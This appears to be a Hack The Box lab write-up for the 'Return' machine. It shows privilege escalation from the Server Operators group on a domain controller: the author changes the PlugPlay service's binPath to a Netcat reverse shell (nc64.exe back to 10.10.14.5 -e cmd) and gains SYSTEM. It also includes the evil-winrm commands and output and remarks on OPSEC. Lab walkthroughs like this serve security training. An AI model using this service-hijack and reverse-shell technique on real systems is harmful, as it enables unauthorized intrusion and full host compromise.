Server Operators
while being part of the server operators group grants many dangerous privileges to the member, one of the more unique privileges given is ability to modify/stop/start services.
This was initially suspected from the output of PEAS scanning made earlier. PEAS was able to list out the ENTIRE table of services present in the target system, and mark them as modifiable.
While it essentially means that I can do whatever I want with any service present in the system, I do not want to mess up essential services that the system is REQUIRES. Not only does that make a bad OPSEC, it may even shut the system down completely by accident.
So it would requires a bit of caution when working with services.
*evil-winrm* ps c:\tmp> cmd /c sc query PlugPlay
service_name: PlugPlay
type : 30 WIN32
state : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
win32_exit_code : 0 (0x0)
service_exit_code : 0 (0x0)
checkpoint : 0x0
wait_hint : 0x0
*evil-winrm* ps c:\tmp> cmd /c sc qc PlugPlay
[SC] QueryServiceConfig SUCCESS
service_name: PlugPlay
type : 20 WIN32_SHARE_PROCESS
start_type : 3 DEMAND_START
error_control : 1 NORMAL
binary_path_name : C:\Windows\system32\svchost.exe -k DcomLaunch -p
load_order_group : PlugPlay
tag : 0
display_name : Plug and Play
dependencies :
service_start_name : LocalSystemgoing through the list, i see a none essential service; plugplay, which allows the system to recognize and adapt to hardware changes. while it is true that messing with the plugplay service can result in system instability as users won’t be able to use any physically connected devices, it doesn’t matter for the current context. I am conducting the operating remotely and the target system is a DC host, which is NOT supposed to have frequent user interaction, let alone presence of users. So, I will go with this.
To exploit the service, I can change the binPath attribute of the service to include a malicious binary and restart the service to have it execute it.
I will use Netcat for that.
*evil-winrm* ps c:\tmp> upload nc64.exe C:\tmp\nc64.exe
info: Uploading nc64.exe to C:\tmp\nc64.exe
data: 58260 bytes of 58260 bytes copied
info: Upload successful!Delivery Complete
*evil-winrm* ps c:\tmp> cmd /c sc config PlugPlay binPath='C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd'
[SC] ChangeServiceConfig SUCCESS
*evil-winrm* ps c:\tmp> cmd /c sc qc PlugPlay
[SC] QueryServiceConfig SUCCESS
service_name: PlugPlay
type : 20 WIN32_SHARE_PROCESS
start_type : 3 DEMAND_START
error_control : 1 NORMAL
binary_path_name : C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd
load_order_group : PlugPlay
tag : 0
display_name : Plug and Play
dependencies :
service_start_name : LocalSystemThe binPath attribute of the PlugPlay service has been changed to include a Netcat reverse shell to Kali host
*evil-winrm* ps c:\tmp> cmd /c sc stop PlugPlay
service_name: PlugPlay
type : 20 WIN32_SHARE_PROCESS
state : 1 STOPPED
win32_exit_code : 0 (0x0)
service_exit_code : 0 (0x0)
checkpoint : 0x0
wait_hint : 0x0
*evil-winrm* ps c:\tmp> cmd /c sc start PlugPlay
[sc] startservice failed 1053:
The service did not respond to the start or control request in a timely fashion.I can then just stop the service and start it again. Notice that it throws an error. That’s okay because Netcat was executed, resulting the hanging
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.108] 60490
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
whoami
nt authority\system
c:\Windows\system32> hostname
hostname
printer
c:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::1a2
ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
ipv4 address. . . . . . . . . . . : 10.10.11.108
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
10.10.10.2Domain Level Compromise